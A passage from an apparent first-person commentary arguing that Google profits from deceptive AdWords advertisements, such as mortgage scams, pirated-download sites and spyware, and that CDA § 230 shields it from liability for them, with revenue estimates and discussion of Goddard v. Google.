  • Mortgage modification offers . Consumers seeking mortgage modifications often receive AdWords advertisements making deceptive claims. A recent Consumer Watchdog study found AdWords advertisers falsely claiming to be affiliated with the US government, requiring consumers to buy credit reports before receiving advice or help (yielding immediate referral fees to the corresponding sites), and even presenting fake certification logos. One prominent AdWords advertiser had previously faced FTC litigation for telemarketing fraud, while another faced FTC litigation for falsely presenting itself as affiliated with the US government. Other advertisers suffer unsatisfactory BBB ratings, and some advertisers falsely claim to have 501(c)(3) non-profit status.

Google’s Revenue from Deceptive Advertisements

Google does not report its revenues for specific sectors, so it is generally difficult to know how much money Google receives from particular categories of unlawful advertisements or from particular unlawful practices. That said, in some instances such information nonetheless becomes available. For example, the Wall Street Journal reported that Google charged $809,000 to one company advertising tools for unauthorized audio and video downloads. In 2006, I estimated that Google charged more than $2 million per year for advertisements distributing spyware and adware shown when users search for the single keyword “screensavers.” Scaling up to other keywords pushing spyware and adware, I suggested Google collects $25+ million per year for advertisements distributing spyware and adware.

Importantly, when AdWords advertisements deliver users into unlawful sites, the majority of the profits flow to Google. Consider a keyword for which several advertisers present similar unlawful offers. The advertisers bid against each other in Google’s auction-style advertising sales process — quickly bidding the price to a level where none of them can justify higher payments. If the advertisers are similar, they end up bidding away most of their profits. Indeed, most of these advertisers have low marginal costs, so their profit approaches their revenue, and Google even collects the majority of their revenue. In 2006 I ran an auction simulation to consider bidder behavior with 10 bidders and 20% standard deviation in per-click valuations; I found that in this situation, advertisers on average paid 71% of their revenue to Google. Drawing on litigation documents, the WSJ reports similar values: EasyDownloadCenter and TheDownloadCenter collected $1.1 million from users, but paid $809,000 (74%) to Google for AdWords advertising. Consumer Watchdog’s revenue estimates, drawn from Google’s own traffic estimation tools, reveal that an advertiser would need to pay more than $6 million per year to capture all the clicks from searches for “credit repair” and “bad credit.”

The Scope of Google’s Involvement — and Resulting Liability

Multiple sources have revealed Google’s far-reaching involvement in facilitating and supporting deceptive advertisements. For example, Google staff supplied EasyDownloadCenter and TheDownloadCenter with keywords to reach users, including “bootleg movie download,” “pirated,” and “download harry potter movie.” Similarly, plaintiffs in Goddard v. Google alleged that not only did Google show deceptive advertisements for “free ringtones” and similar searches, but Google’s own systems affirmatively suggested that advertisers target the phrase “free ringtones” (deceptive, since the advertisers’ service weren’t actually free) when advertisers requested only the word “ringtones.” Google’s involvement also extends to financing. For example, the WSJ reports that Google extended credit to EasyDownloadCenter and TheDownloadCenter — letting them expand their advertising effort without needing to pay Google in advance (as most advertisers must). In short, Google knew about these deceptive advertisements, profited from them, and provided assistance to the corresponding advertisers in the selection of keywords, in the provision of credit, and otherwise.

One might naturally expect that Google is liable when its actions cause harm to consumers — especially when Google knows what is occurring and profits from it. But the Communications Decency Act potentially offers Google a remarkable protection: CDA § 230 instructs that a provider of an interactive computer service may not be treated as the publisher of content others provide through that service. Even if a printed publication would face liability for printing the same advertisements Google shows, CDA § 230 is often interpreted to provide that Google may distribute such advertisements online with impunity. Indeed, that’s exactly the conclusion reached in Goddard v. Google, finding that even if Google’s keyword tools suggests “free ringtone” to advertisers and even if Google is aware of fraudulent mobile subscription services, Google is not liable to affected consumers.

The broad application of CDA § 230 immunity has attracted ample criticism. For example, a 2000 DOJ study concluded that “substantive regulation … should, as a rule, apply in the same way to conduct in the cyberworld as it does to conduct in the physical world.” Yet CDA § 230 unapologetically invites Google to show all manner of unlawful advertisements that would create liability if distributed by traditional publishers. And if Google can turn a blind eye to advertisers using its ad platform to defraud or otherwise harm users, advertisers will do so with impunity. For Google to escape liability is all the more puzzling when Google reaps most of the profits from advertisers’ schemes.

CDA § 230 includes several important exceptions. For example, the CDA does not immunize violations of criminal law — and rogue pharmacies implicate various criminal laws, giving rise to the liability for which Google now expects to pay $500 million. But this exception may be broader than critics yet realize. For example, large-scale copyright infringement and distribution of counterfeit goods may also create criminal liability for the underlying advertisers, hence excluding Google from the CDA safe-harbor for the corresponding advertisements.

Ultimately, I stand by my 2006 conclusion: “Google ought to do more to make ads safe.” Since then, Google’s revenue and profit have more than doubled, giving Google that much greater resources to evaluate advertisers. But I wouldn’t say Google’s users are twice as safe — quite the contrary, deceptive and unlawful advertisements remain all too widespread. Kudos to the Department of Justice for holding Google accountable for unlawful pharmacy advertisements — but there’s ample more work to be done in light of Google’s other unlawful advertisements.